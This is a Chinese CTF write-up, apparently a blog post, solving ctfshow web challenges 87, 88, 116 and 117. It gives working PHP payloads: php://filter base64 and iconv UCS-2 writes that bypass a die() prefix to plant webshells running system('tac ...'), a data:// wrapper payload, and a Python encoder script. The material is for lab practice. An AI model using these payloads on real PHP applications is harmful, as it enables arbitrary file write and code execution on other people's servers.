ctfshow web入门 web87--web88&&web116--web117

web87

神奇这道题我写了一个小时终于写好了
file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);:整个函数调用的作用是将解码后的 file 作为目标文件路径,然后将前面定义的终止执行提示语句与 content 的内容拼接起来,一起写入到目标文件中。
意思是要进行url解码然后再写文件 并且要绕过死亡(file_put_content

content是写入内容,要进行base64编码 ,而base解码时,是4个一组,flag.php(要写入的文件),写入的内容<?php die('大佬别秀了');?>,只有phpdie会参与base64解码,因为phpdie只有6个字节,补两个a就是8字节了再与我们写的命令内容进行拼接

下面这篇文章是绕过死亡的
https://xz.aliyun.com/t/8163?time__1311=n4%2BxuDgDBDyGKAKD%3DD7Dl1oQ4iK4%2BD0KqPPoqx&alichlgref=https%3A%2F%2Fxz.aliyun.com%2Ft%2F8163#toc-2

构造payload

php 复制代码
/?file=php://filter/write=convert.base64-decode/resource=1.php

两次URL编码(浏览器(hackbar)一次,题目绕过一次)为

php 复制代码
?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30

(工具用的bp的编码器,这个编码器我找了好久好久)

php 复制代码
<?php system('ls');?>

进行base64编码

复制代码
PD9waHAgc3lzdGVtKCdscycpOz8+

POST传参content=aaPD9waHAgc3lzdGVtKCdscycpOz8+
然后查看fl0g.php

php 复制代码
<?php system('tac fl0g.php');?>
复制代码
PD9waHAgc3lzdGVtKCd0YWMgZmwwZy5waHAnKTs/Pg==
php 复制代码
content=aaPD9waHAgc3lzdGVtKCd0YWMgZmwwZy5waHAnKTs/Pg==

web88

php伪协议进行绕过(但是编码的时候必须绕过=和+)
欧克了这样子就没有了

php 复制代码
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTs/PnNz

web116

是一个视频利用winhex分离源码(我还没下载具体步骤后面补充)

这里借图一用

正则匹配但是最后一句file_get_content($file);直接打开file这个文件

php 复制代码
?file=flag.php

抓包发送
到手

web117

用php伪协议绕过但是常见的编码都被过滤这里有一种新的编码

iconv.UCS-2LE.UCS-2BE编码就是把每两位字符换位。

php 复制代码
?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=1.php

编码脚本

python 复制代码
str = "<?=system('tac f*');"
str_encoded = ''
for i in range(len(str)):
    if i % 2 == 1:
        str_encoded += str[i]
        str_encoded += str[i-1]
print(str_encoded) 		# ?<s=syet(mt'caf '*;)
php 复制代码
content=?<s=syet(mt'caf '*;)

然后访问1.php
到手

相关推荐
Chengbei1117 小时前
VMware Workstation Pro 26H1免费虚拟化利器
运维·安全·web安全·自动化·系统安全·apache·安全架构
云水一下1 天前
DVWA从入门到精通(十八):Cryptography(密码学问题)
web安全·密码学·dvwa
糖果店的幽灵1 天前
安全测试从入门到精通 - 环境搭建与基础工具选择
安全·web安全
云水一下2 天前
DVWA从入门到精通(十七):Open HTTP Redirect(开放重定向)
web安全·dvwa·开放重定向
txg6663 天前
网络安全领域简报(2026年7月3日—10日)
安全·web安全·网络安全
Chengbei113 天前
SoloXSS:一款现代化的自托管 XSS平台
人工智能·安全·web安全·网络安全·自动化·xss·安全架构
2301_780303903 天前
网络安全、自动化运维、ERP、CRM、MES
运维·web安全·网络安全·自动化·安全威胁分析
技术不好的崎鸣同学3 天前
[GXYCTF2019]Ping Ping Ping 思路及解法
网络·安全·web安全
dehuisun3 天前
等保2.0实施方案
web安全
treesforest4 天前
高精度IP定位怎么选?从企业需求出发的选型指南
网络·数据库·tcp/ip·web安全·ip·高精度ip查询